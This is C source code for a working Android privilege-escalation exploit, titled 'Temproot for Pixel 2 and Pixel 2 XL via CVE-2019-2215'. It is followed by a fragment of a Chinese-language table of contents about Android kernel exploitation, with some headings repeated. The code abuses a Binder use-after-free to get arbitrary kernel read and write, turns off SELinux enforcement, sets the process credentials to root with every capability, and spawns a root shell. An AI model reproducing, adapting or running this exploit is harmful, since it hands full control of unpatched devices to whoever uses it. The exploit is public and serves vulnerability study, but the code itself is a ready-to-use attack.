 *  ffffff9baf8e3780 selinux_enabled
 *  ffffff9bafc4e4a8 selinux_enforcing
 *  ffffffe6b2942b80 current
 *  debug> write ffffff9bafc4e4a8 01 00 00 00
 *  debug> exit
 *  taimen:/data/local/tmp $ getenforce
 *  Enforcing
 *  taimen:/data/local/tmp $
 *
 */

#define _GNU_SOURCE
#include <ctype.h>
#include <err.h>
#include <errno.h>
#include <error.h>
#include <fcntl.h>
#include <linux/sched.h>
#include <sched.h>
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/epoll.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/prctl.h>
#include <sys/socket.h>
#include <sys/uio.h>
#include <sys/un.h>
#include <sys/utsname.h>
#include <sys/wait.h>
#include <unistd.h>

typedef uint8_t u8;
typedef uint32_t u32;
typedef uint64_t u64;

// #include <linux/android/binder.h>
#define BINDER_THREAD_EXIT 0x40046208ul
// NOTE: we don't cover the task_struct* here; we want to leave it uninitialized
#ifndef PAGE_SIZE
#define PAGE_SIZE 0x1000
#endif

/* Data structure definitions as found in the Sep 2019 QP1A.190711.020 build of
 * Android 10 for walleye/taimen, kernel version-BuildID 4.4.177-g83bee1dc48e8.
 * Verified using `pahole` on a build of the official Android kernel/msm git:
 *
 *  https://android.googlesource.com/kernel/msm/+/refs/heads/android-msm-wahoo-4.4-android10
 *  (tree a4557a647a054b871bdf8e452a014cafa0ae5078)
 *
 * We leave only the fields in which we're interested, and we're really only
 * interested in their offsets; the others_* fields are padding.
 *
 *                            (<original type>           <offset> <size>)
 */
struct binder_thread {
    u8 others_0[160];
    u8 wait[24];           /*  wait_queue_head_t           160     24  */
    u8 others_1[216];
    // u8 others_1[224];   /* NOTE: see binder_iovecs below */
} __attribute__((packed)); /* size: 408 in kernel, 400 here */

struct task_struct {
    u8 others_0[1312];
    u64 mm;                /*  struct mm_struct *          1312    8   */
    u8 others_1[608];
    u64 real_cred;         /*  const struct cred *         1928    8   */
    u64 cred;              /*  const struct cred *         1936    8   */
    u8 others_2[1736];
} __attribute__((packed)); /* size: 3680 */

struct mm_struct {
    u8 others_0[768];
    u64 user_ns;           /*  struct user_namespace *     768     8   */
    u8 others_1[48];
} __attribute__((packed)); /* size: 824 */

struct cred {
    u8 others_0[4];
    u32 uid;               /*  kuid_t                      4       4   */
    u32 gid;               /*  kgid_t                      8       4   */
    u32 suid;              /*  kuid_t                      12      4   */
    u32 sgid;              /*  kgid_t                      16      4   */
    u32 euid;              /*  kuid_t                      20      4   */
    u32 egid;              /*  kgid_t                      24      4   */
    u32 fsuid;             /*  kuid_t                      28      4   */
    u32 fsgid;             /*  kgid_t                      32      4   */
    u32 securebits;        /*  unsigned int                36      4   */
    u64 cap_inheritable;   /*  kernel_cap_t                40      8   */
    u64 cap_permitted;     /*  kernel_cap_t                48      8   */
    u64 cap_effective;     /*  kernel_cap_t                56      8   */
    u64 cap_bset;          /*  kernel_cap_t                64      8   */
    u64 cap_ambient;       /*  kernel_cap_t                72      8   */
    u8 others_1[40];
    u64 security;          /*  void *                      120     8   */
    u8 others_2[40];
} __attribute__((packed)); /* size: 168 */

struct task_security_struct {
    u32 osid;              /*  u32                         0       4   */
    u32 sid;               /*  u32                         4       4   */
    u32 exec_sid;          /*  u32                         8       4   */
    u32 create_sid;        /*  u32                         12      4   */
    u32 keycreate_sid;     /*  u32                         16      4   */
    u32 sockcreate_sid;    /*  u32                         20      4   */
} __attribute__((packed)); /* size: 24 */

/* Kernel symbol table offsets, relative to _head, in the QP1A.190711.020
 * walleye/taimen kernel. The SELinux-related offsets were determined with
 * reference to System.map and a minor bit of trial-and-error.
 */
const ptrdiff_t ksym_init_task = 0x20257d0;
const ptrdiff_t ksym_init_user_ns = 0x202f2c8;
const ptrdiff_t ksym_selinux_enabled = 0x2063780;
const ptrdiff_t ksym_selinux_enforcing = 0x23ce4a8;

/* The exploit relies upon a use-after-free by the kernel's epoll cleanup code
 * resulting from an oversight in Android's Binder IPC subsystem, fixed here:
 *
 *  https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/drivers/android/binder.c?h=linux-4.14.y&id=7a3cee43e935b9d526ad07f20bf005ba7e74d05b
 *
 * In the original Project Zero POC, arrays of 25 `struct iovec`s are treated
 * as `struct binder_thread`s by the kernel. We do the same here via a union,
 * which hopefully clarifies where the #defines of 25 and 10 came from in the
 * original POC. Since we're using structure definitions for offsets only, we're
 * fine cutting off 8 bytes from our definition of a `struct binder_thread` to
 * ensure `sizeof(binder_iovecs) == sizeof(struct iovec[25]) == 400`.
 */
const size_t iovs_sz = sizeof(struct binder_thread) / sizeof(struct iovec);
const size_t iov_idx = offsetof(struct binder_thread, wait) / sizeof(struct iovec);
typedef union {
    struct binder_thread bt;
    struct iovec iovs[iovs_sz];
} binder_iovecs;

void kwrite(u64 kaddr, void *buf, size_t len);
void kread(u64 kaddr, void *buf, size_t len);
void kwrite_u64(u64 kaddr, u64 data);
void kwrite_u32(u64 kaddr, u32 data);
u64 kread_u64(u64 kaddr);
u64 kread_u32(u64 kaddr);

void prepare_globals(void);
void find_current(void);
void obtain_kernel_rw(void);
void find_kernel_base(void);
void patch_creds(void);
void launch_shell(void);
void launch_debug_console(void);

void con_loop(void);
int con_consume(char **token);
int con_parse_hexstring(char *token, u64 *val);
int con_parse_number(char *token, u64 *val);
int con_parse_hexbytes(char **token, u8 **data, size_t *len);
void con_kdump(u64 kaddr, size_t len);

void execute_stage(int op);
void notify_stage_failure(void);

int main(int argc, char *argv[]);

pid_t pid;
int debugging;
void *dummy_page;
int kernel_rw_pipe[2];
int binder_fd;
int epoll_fd;

u64 current;
u64 kernel_base;

void kwrite(u64 kaddr, void *buf, size_t len) {
    errno = 0;
    if (len > PAGE_SIZE)
        errx(1, "kernel writes over PAGE_SIZE are messy, tried 0x%lx", len);
    if (write(kernel_rw_pipe[1], buf, len) != (ssize_t)len)
        err(1, "kwrite failed to load userspace buffer");
    if (read(kernel_rw_pipe[0], (void *)kaddr, len) != (ssize_t)len)
        err(1, "kwrite failed to overwrite kernel memory");
}
void kread(u64 kaddr, void *buf, size_t len) {
    errno = 0;
    if (len > PAGE_SIZE)
        errx(1, "kernel reads over PAGE_SIZE are messy, tried 0x%lx", len);
    if (write(kernel_rw_pipe[1], (void *)kaddr, len) != (ssize_t)len)
        err(1, "kread failed to read kernel memory");
    if (read(kernel_rw_pipe[0], buf, len) != (ssize_t)len)
        err(1, "kread failed to write out to userspace");
}
u64 kread_u64(u64 kaddr) {
    u64 data;
    kread(kaddr, &data, sizeof(data));
    return data;
}
u64 kread_u32(u64 kaddr) {
    u32 data;
    kread(kaddr, &data, sizeof(data));
    return data;
}
void kwrite_u64(u64 kaddr, u64 data) {
    kwrite(kaddr, &data, sizeof(data));
}
void kwrite_u32(u64 kaddr, u32 data) {
    kwrite(kaddr, &data, sizeof(data));
}

void prepare_globals(void) {
    pid = getpid();

    struct utsname kernel_info;
    if (uname(&kernel_info) == -1)
        err(1, "determine kernel release");
    if (strcmp(kernel_info.release, "4.4.177-g83bee1dc48e8"))
        warnx("kernel version-BuildID is not '4.4.177-g83bee1dc48e8'");

    dummy_page = mmap((void *)0x100000000ul, 2 * PAGE_SIZE,
                      PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (dummy_page != (void *)0x100000000ul)
        err(1, "mmap 4g aligned");
    if (pipe(kernel_rw_pipe))
        err(1, "kernel_rw_pipe");

    binder_fd = open("/dev/binder", O_RDONLY);
    epoll_fd = epoll_create(1000);
}

void find_current(void) {
    /* Originally: void leak_task_struct(void); */
    struct epoll_event event = {.events = EPOLLIN};
    if (epoll_ctl(epoll_fd, EPOLL_CTL_ADD, binder_fd, &event))
        err(1, "epoll_add");

    binder_iovecs bio;
    memset(&bio, 0, sizeof(bio));
    bio.iovs[iov_idx].iov_base = dummy_page;             /* spinlock in the low address half must be zero */
    bio.iovs[iov_idx].iov_len = PAGE_SIZE;               /* wq->task_list->next */
    bio.iovs[iov_idx + 1].iov_base = (void *)0xdeadbeef; /* wq->task_list->prev */
    bio.iovs[iov_idx + 1].iov_len = PAGE_SIZE;

    int pipe_fd[2];
    if (pipe(pipe_fd))
        err(1, "pipe");
    if (fcntl(pipe_fd[0], F_SETPIPE_SZ, PAGE_SIZE) != PAGE_SIZE)
        err(1, "pipe size");
    static char page_buffer[PAGE_SIZE];

    pid = fork();
    if (pid == -1)
        err(1, "fork");
    if (pid == 0) {
        /* Child process */
        prctl(PR_SET_PDEATHSIG, SIGKILL);
        sleep(2);
        epoll_ctl(epoll_fd, EPOLL_CTL_DEL, binder_fd, &event);
        // first page: dummy data
        if (read(pipe_fd[0], page_buffer, PAGE_SIZE) != PAGE_SIZE)
            err(1, "read full pipe");
        close(pipe_fd[1]);
        exit(0);
    }

    ioctl(binder_fd, BINDER_THREAD_EXIT, NULL);
    ssize_t writev_ret = writev(pipe_fd[1], bio.iovs, iovs_sz);
    if (writev_ret != (ssize_t)(2 * PAGE_SIZE))
        errx(1, "writev() returns 0x%lx, expected 0x%lx\n",
             writev_ret, (ssize_t)(2 * PAGE_SIZE));
    // second page: leaked data
    if (read(pipe_fd[0], page_buffer, PAGE_SIZE) != PAGE_SIZE)
        err(1, "read full pipe");

    pid_t status;
    if (wait(&status) != pid)
        err(1, "wait");

    current = *(u64 *)(page_buffer + 0xe8);
}
void obtain_kernel_rw(void) {
    /* Originally: void clobber_addr_limit(void); */
    struct epoll_event event = {.events = EPOLLIN};
    if (epoll_ctl(epoll_fd, EPOLL_CTL_ADD, binder_fd, &event))
        err(1, "epoll_add");

    binder_iovecs bio;
    memset(&bio, 0, sizeof(bio));
    bio.iovs[iov_idx].iov_base = dummy_page;             /* spinlock in the low address half must be zero */
    bio.iovs[iov_idx].iov_len = 1;                       /* wq->task_list->next */
    bio.iovs[iov_idx + 1].iov_base = (void *)0xdeadbeef; /* wq->task_list->prev */
    bio.iovs[iov_idx + 1].iov_len = 0x8 + 2 * 0x10;      /* iov_len of previous, then this element and next element */
    bio.iovs[iov_idx + 2].iov_base = (void *)0xbeefdead;
    bio.iovs[iov_idx + 2].iov_len = 8; /* should be correct from the start, kernel will sum up lengths when importing */

    u64 second_write_chunk[] = {
        1,                 /* iov_len */
        0xdeadbeef,        /* iov_base (already used) */
        0x8 + 2 * 0x10,    /* iov_len (already used) */
        current + 0x8,     /* next iov_base (addr_limit) */
        8,                 /* next iov_len (sizeof(addr_limit)) */
        0xfffffffffffffffe /* value to write */
    };

    int socks[2];
    if (socketpair(AF_UNIX, SOCK_STREAM, 0, socks))
        err(1, "socketpair");
    if (write(socks[1], "X", 1) != 1)
        err(1, "write socket dummy byte");

    pid = fork();
    if (pid == -1)
        err(1, "fork");
    if (pid == 0) {
        /* Child process */
        prctl(PR_SET_PDEATHSIG, SIGKILL);
        sleep(2);
        epoll_ctl(epoll_fd, EPOLL_CTL_DEL, binder_fd, &event);
        size_t write_sz = sizeof(second_write_chunk);
        if (write(socks[1], second_write_chunk, write_sz) != (ssize_t)write_sz)
            err(1, "write second chunk to socket");
        exit(0);
    }

    ioctl(binder_fd, BINDER_THREAD_EXIT, NULL);
    struct msghdr msg = {.msg_iov = bio.iovs, .msg_iovlen = iovs_sz};
    size_t recvmsg_sz = bio.iovs[iov_idx].iov_len +
                        bio.iovs[iov_idx + 1].iov_len +
                        bio.iovs[iov_idx + 2].iov_len;
    ssize_t recvmsg_ret = recvmsg(socks[0], &msg, MSG_WAITALL);
    if (recvmsg_ret != (ssize_t)recvmsg_sz)
        errx(1, "recvmsg() returns %ld, expected %lu\n", recvmsg_ret, recvmsg_sz);

    setbuf(stdout, NULL);
}
void find_kernel_base(void) {
    u64 current_mm = kread_u64(current + offsetof(struct task_struct, mm));
    u64 current_user_ns = kread_u64(current_mm + offsetof(struct mm_struct, user_ns));
    kernel_base = current_user_ns - ksym_init_user_ns;
    if (kernel_base & 0xffful) {
        if (debugging) {
            warnx("bad kernel base (not 0x...000)");
            kernel_base = 0;
            return;
        } else {
            errx(1, "bad kernel base (not 0x...000)");
        }
    }

    u64 init_task = kernel_base + ksym_init_task;
    u64 cred_ptrs[2] = {
        kread_u64(init_task + offsetof(struct task_struct, real_cred)), /* init_task.real_cred */
        kread_u64(init_task + offsetof(struct task_struct, cred)),      /* init_task.cred */
    };

    /* Examine what we think are the init process' credentials.
     * Presumably, these tests are unlikely to pass unless we have the right
     * kernel base, kernel symbol offsets, and kernel data structure offsets.
     */
    for (int cred_idx = 0; cred_idx < 2; cred_idx++) {
        struct cred cred;
        kread(cred_ptrs[cred_idx], &cred, sizeof(struct cred));

        if (cred.uid || cred.gid || cred.suid || cred.sgid ||
            cred.euid || cred.egid || cred.fsuid || cred.fsgid) {
            if (debugging) {
                warnx("bad kernel base (init_task not where expected)");
                kernel_base = 0;
                return;
            } else {
                errx(1, "bad kernel base (init_task not where expected)");
            }
        }

        const u64 cap = 0x3fffffffff;
        if (cred.cap_inheritable || cred.cap_permitted != cap ||
            cred.cap_effective != cap || cred.cap_bset != cap ||
            cred.cap_ambient) {
            if (debugging) {
                warnx("bad kernel base (init_task not where expected)");
                kernel_base = 0;
                return;
            } else {
                errx(1, "bad kernel base (init_task not where expected)");
            }
        }

        /* .real_cred == .cred, probably. */
        if (cred_ptrs[0] == cred_ptrs[1])
            break;
    }
}
void patch_creds(void) {
    u64 cred_ptrs[2] = {
        kread_u64(current + offsetof(struct task_struct, real_cred)), /* current->real_cred */
        kread_u64(current + offsetof(struct task_struct, cred)),      /* current->cred */
    };

    /* Final check: our struct cred(s?) in the kernel should contain our uid. */
    if (kread_u32(cred_ptrs[0] + offsetof(struct cred, uid)) != getuid())
        errx(1, "bad cred (current->real_cred->uid not our own uid)");
    if (cred_ptrs[0] != cred_ptrs[1])
        if (kread_u32(cred_ptrs[1] + offsetof(struct cred, uid)) != getuid())
            errx(1, "bad cred (current->cred->uid not our own uid)");

    /* Just disabling selinux_enforcing should suffice for our purposes. SELinux
     * still does MAC (mandatory access control) checks on our actions based on
     * our security contexts, but violations are logged, not prevented. Our
     * permissions then fall back to DAC (discretionary access control), i.e.
     * user accounts/groups. And as we know, the root user is DAC omnipotent.
     */
    // kwrite_u32(kernel_base + ksym_selinux_enabled, 0);
    kwrite_u32(kernel_base + ksym_selinux_enforcing, 0);

    /* Patch our struct cred(s?) in the kernel. */
    for (int cred_idx = 0; cred_idx < 2; cred_idx++) {
        u64 cred_ptr = cred_ptrs[cred_idx];

        /* All 8 (e|f?s)?[ug]id members should be set to 0, making us root. */
        kwrite_u32(cred_ptr + offsetof(struct cred, uid), 0);
        kwrite_u32(cred_ptr + offsetof(struct cred, gid), 0);
        kwrite_u32(cred_ptr + offsetof(struct cred, suid), 0);
        kwrite_u32(cred_ptr + offsetof(struct cred, sgid), 0);
        kwrite_u32(cred_ptr + offsetof(struct cred, euid), 0);
        kwrite_u32(cred_ptr + offsetof(struct cred, egid), 0);
        kwrite_u32(cred_ptr + offsetof(struct cred, fsuid), 0);
        kwrite_u32(cred_ptr + offsetof(struct cred, fsgid), 0);

        /* What to do with securebits is not as obvious. The comment for it in
         * the kernel source reads 'SUID-less security management'. In the init
         * process' cred(s?), this is set to 0, so we might as well do the same.
         */
        kwrite_u32(cred_ptr + offsetof(struct cred, securebits), 0);

        /* All 5 cap_.+ members should be bitset to all 1's. We will have all
         * capability bits set, and our children will be able to inherit them.
         */
        kwrite_u64(cred_ptr + offsetof(struct cred, cap_inheritable), ~(u64)0);
        kwrite_u64(cred_ptr + offsetof(struct cred, cap_permitted), ~(u64)0);
        kwrite_u64(cred_ptr + offsetof(struct cred, cap_effective), ~(u64)0);
        kwrite_u64(cred_ptr + offsetof(struct cred, cap_bset), ~(u64)0);
        kwrite_u64(cred_ptr + offsetof(struct cred, cap_ambient), ~(u64)0);

        /* Also patch our task_security_struct(s?). This is not necessary with
         * SELinux bypassed, but we will again match init's settings and set
         * the osid and sid members to 1.
         */
        u64 security_ptr = kread_u64(cred_ptr + offsetof(struct cred, security));
        kwrite_u32(security_ptr + offsetof(struct task_security_struct, osid), 1);
        kwrite_u32(security_ptr + offsetof(struct task_security_struct, sid), 1);

        /* .real_cred == .cred, probably. */
        if (cred_ptrs[0] == cred_ptrs[1])
            break;
    }

    if (getuid())
        errx(1, "did some patching, but our uid is not 0");
}
void launch_shell(void) {
    if (execl("/bin/sh", "/bin/sh", (char *)NULL) == -1)
        err(1, "launch shell");
}
void launch_debug_console(void) {
    printf("launching debug console; enter 'help' for quick help\n");
    con_loop();
}

void con_loop(void) {
    u64 kaddr;
    size_t len;

    int running = 1;
    while (running) {
        printf("debug> ");

        char *line = NULL;
        size_t getline_buf_len = 0;
        if (getline(&line, &getline_buf_len, stdin) == -1)
            err(1, "read stdin");
        int was_handled = 0;

        char *token = strtok(line, " \t\r\n\a");
        if (token && !strcmp(token, "print") && con_consume(&token)) {
            printf("%lx kernel_base\n", kernel_base);
            printf("%lx init_task\n", kernel_base + ksym_init_task);
            printf("%lx init_user_ns\n", kernel_base + ksym_init_user_ns);
            printf("%lx selinux_enabled\n", kernel_base + ksym_selinux_enabled);
            printf("%lx selinux_enforcing\n", kernel_base + ksym_selinux_enforcing);
            printf("%lx current\n", current);
            was_handled = 1;
        } else if (token && !strcmp(token, "read")) {
            /* Not that there'd actually be any kmem allocated there, but if the
             * read address were 0xffffffffffffffff, we'd technically be able to
             * read exactly one byte. We ~do~ want to handle that case... right?
             */
            if (con_parse_hexstring(strtok(NULL, " \t\r\n\a"), &kaddr) &&
                con_parse_number(strtok(NULL, " \t\r\n\a"), &len) &&
                con_consume(&token) && 0 < len && len <= PAGE_SIZE &&
                len - 1 <= ~(u64)0 - kaddr) {
                con_kdump(kaddr, len);
                was_handled = 1;
            }
        } else if (token && !strcmp(token, "write")) {
            u8 *data = NULL;
            if (con_parse_hexstring(strtok(NULL, " \t\r\n\a"), &kaddr) &&
                con_parse_hexbytes(&token, &data, &len) && 0 < len &&
                len <= PAGE_SIZE && len - 1 <= ~(u64)0 - kaddr) {
                kwrite(kaddr, data, len);
                was_handled = 1;
            }
            free(data);
        } else if (token && !strcmp(token, "shell") && con_consume(&token)) {
            pid = fork();
            if (pid == -1)
                err(1, "fork");
            if (pid == 0)
                launch_shell();
            pid_t status;
            do {
                waitpid(pid, &status, WUNTRACED);
            } while (!WIFEXITED(status) && !WIFSIGNALED(status));
            was_handled = 1;
        } else if (token && !strcmp(token, "help") && con_consume(&token)) {
            printf(
                "quick help\n"
                "    print\n"
                "        print kernel base address, some kernel symbol offsets,\n"
                "        and address of current task_struct as hexstrings\n"
                "    read <kaddr> <len>\n"
                "        read <len> bytes from <kaddr> and display as a hexdump\n"
                "        <kaddr> is a hexstring not prefixed with 0x\n"
                "        <len> is 1-4096 or 0x1-0x1000\n"
                "    write <kaddr> <data>\n"
                "        write <data> to <kaddr>\n"
                "        <kaddr> is a hexstring not prefixed with 0x\n"
                "        <data> is 1-4096 hexbytes, spaces ignored, to be written *AS-IS*\n"
                "        e.g. if kaddr 0xffffffffdeadbeef contains an int, and you want to set\n"
                "        its value to 1, enter 'write ffffffffdeadbeef <data>', where <data> is\n"
                "        '01000000', '0100 0000', '01 00 0 0 00', etc. (our ARM is little-endian)\n"
                "    shell\n"
                "        launch a shell (hint: have we ~somehow~ become another user? :P)\n"
                "    help\n"
                "        print this help\n"
                "    exit\n"
                "        exit debug console\n");
            was_handled = 1;
        } else if (token && !strcmp(token, "exit") && con_consume(&token)) {
            running = 0;
            was_handled = 1;
        }

        if (!was_handled)
            printf("woopz; enter 'help' for quick help\n");

        free(line);
    }
}
int con_consume(char **token) {
    int ret = 1;
    do {
        if ((*token = strtok(NULL, " \t\r\n\a")))
            ret = 0;
    } while (*token);
    return ret;
}
int con_parse_hexstring(char *token, u64 *val) {
    if (!token || !(*token))
        return 0;
    *val = 0;
    while (*token) {
        if (*val & 0xf000000000000000)
            return 0;
        else if ('0' <= *token && *token <= '9')
            *val = *val * 16 + *token - '0';
        else if ('a' <= *token && *token <= 'f')
            *val = *val * 16 + *token - 'a' + 10;
        else if ('A' <= *token && *token <= 'F')
            *val = *val * 16 + *token - 'A' + 10;
        else
            return 0;
        token++;
    }
    return 1;
}
int con_parse_number(char *token, u64 *val) {
    if (!token || !(*token))
        return 0;
    if (*token == '0' && (token[1] == 'x' || token[1] == 'X'))
        return con_parse_hexstring(token + 2, val);
    *val = 0;
    while (*token) {
        if (*token < '0' || '9' < *token)
            return 0;
        *val = *val * 10 + *token - '0';
        if (*val > PAGE_SIZE)
            return 0;
        token++;
    }
    return 1;
}
int con_parse_hexbytes(char **token, u8 **data, size_t *len) {
    static char hexbyte[2 + 1] = {'\0'};

    u8 *buf = malloc(PAGE_SIZE * sizeof(u8));
    if (!buf)
        err(1, "allocate memory");

    *data = buf;
    *len = 0;
    int hexbyte_idx = 0;

    while ((*token = strtok(NULL, " \t\r\n\a"))) {
        for (char *c = *token; *c; c++) {
            if (!isxdigit(*c))
                return 0;
            hexbyte[hexbyte_idx++] = *c;
            if (hexbyte_idx == 2) {
                hexbyte_idx = 0;
                u64 val;
                if (*len == PAGE_SIZE || !con_parse_hexstring(hexbyte, &val))
                    return 0;
                buf[(*len)++] = (u8)(val & 0xff);
            }
        }
    }

    return *len && !hexbyte_idx;
}
void con_kdump(u64 kaddr, size_t len) {
    /* Mimic the output of `xxd`. */
    static char line[40 + 1] = {'\0'};
    static char text[16 + 1] = {'\0'};

    if (!len)
        return;

    u8 *buf = malloc(len * sizeof(u8));
    if (!buf)
        err(1, "allocate memory");

    kread(kaddr, buf, len);

    for (u64 line_offset = 0; line_offset < len; line_offset += 16) {
        char *linep = line;
        for (size_t i = 0; i < 16; i++) {
            if (i + line_offset < len) {
                char c = buf[i + line_offset];
                linep += sprintf(linep, (i & 1) ? "%02x " : "%02x", c);
                text[i] = (' ' <= c && c <= '~') ? c : '.';
            } else {
                linep += sprintf(linep, (i & 1) ? "   " : "  ");
                text[i] = ' ';
            }
        }
        printf("%016lx: %s %s\n", kaddr + line_offset, line, text);
    }

    free(buf);
}

/* Excuse this mess; bionic libc doesn't have on_exit(). */
char *stage_desc;
struct stage_t {
    void (*func)(void);
    char *desc;
};
struct stage_t stages[] = {
    {prepare_globals, "startup"},
    {find_current, "find kernel address of current task_struct"},
    {obtain_kernel_rw, "obtain arbitrary kernel memory R/W"},
    {find_kernel_base, "find kernel base address"},
    {patch_creds, "bypass SELinux and patch current credentials"},
    {launch_shell, NULL},
    {launch_debug_console, NULL},
};
void execute_stage(int stage_idx) {
    stage_desc = stages[stage_idx].desc;
    (*stages[stage_idx].func)();
    if (stage_desc && pid && (stage_idx != 3 || kernel_base))
        printf("[+] %s\n", stage_desc);
}
void notify_stage_failure(void) {
    if (stage_desc && pid)
        fprintf(stderr, "[-] %s failed\n", stage_desc);
}

int main(int argc, char *argv[]) {
    atexit(notify_stage_failure);
    debugging = argc == 2 && !strcmp(argv[1], "debug");

    printf("Temproot for Pixel 2 and Pixel 2 XL via CVE-2019-2215\n");

    execute_stage(0); /* prepare_globals() */
    execute_stage(1); /* find_current() */
    execute_stage(2); /* obtain_kernel_rw() */
    execute_stage(3); /* find_kernel_base() */

    if (debugging) {
        if (!kernel_base) {
            notify_stage_failure();
            warnx("printed kernel offsets won't be reliable\n");
        }
        execute_stage(6); /* launch_debug_console() */
    } else {
        execute_stage(4); /* patch_creds() */
        execute_stage(5); /* launch_shell() */
    }

    return 0;
}

Syzkaller For Android Kernel

please goto 《Syzkaller源码分析及利用》…….

Android安全-内核篇

基础知识

CVE 复现

CVE-2023-21400 - Double Free | DirtyPTE

漏洞分析

触发漏洞

尝试

可利用性

提权

创建signalfd_ctx受害者对象

定位受害者signalfd_ctx 对象

回收受害者signalfd_ctx 对象所在的slab

用户页表占据受害者slab

patch内核并提权

CVE-2022-28350 - file UAF | DirtyPTE

file UAF现有利用方法

脏页表方法利用file UAF

回收受害者slab

用户页表占据受害者slab

递增原语+定位受害者PTE对应的虚拟用户地址

堆喷占用页表

CVE-2020-29661 - pid UAF | DirtyPTE

脏页表方法利用CVE-2020-29661

利用pid UAF构造递增原语

分配共享页

Google Pixel 4提权

CVE-2019-2215 - Binder UAF

exploit

Syzkaller For Android Kernel

创建`signalfd_ctx`受害者对象

定位受害者`signalfd_ctx` 对象

回收受害者`signalfd_ctx` 对象所在的slab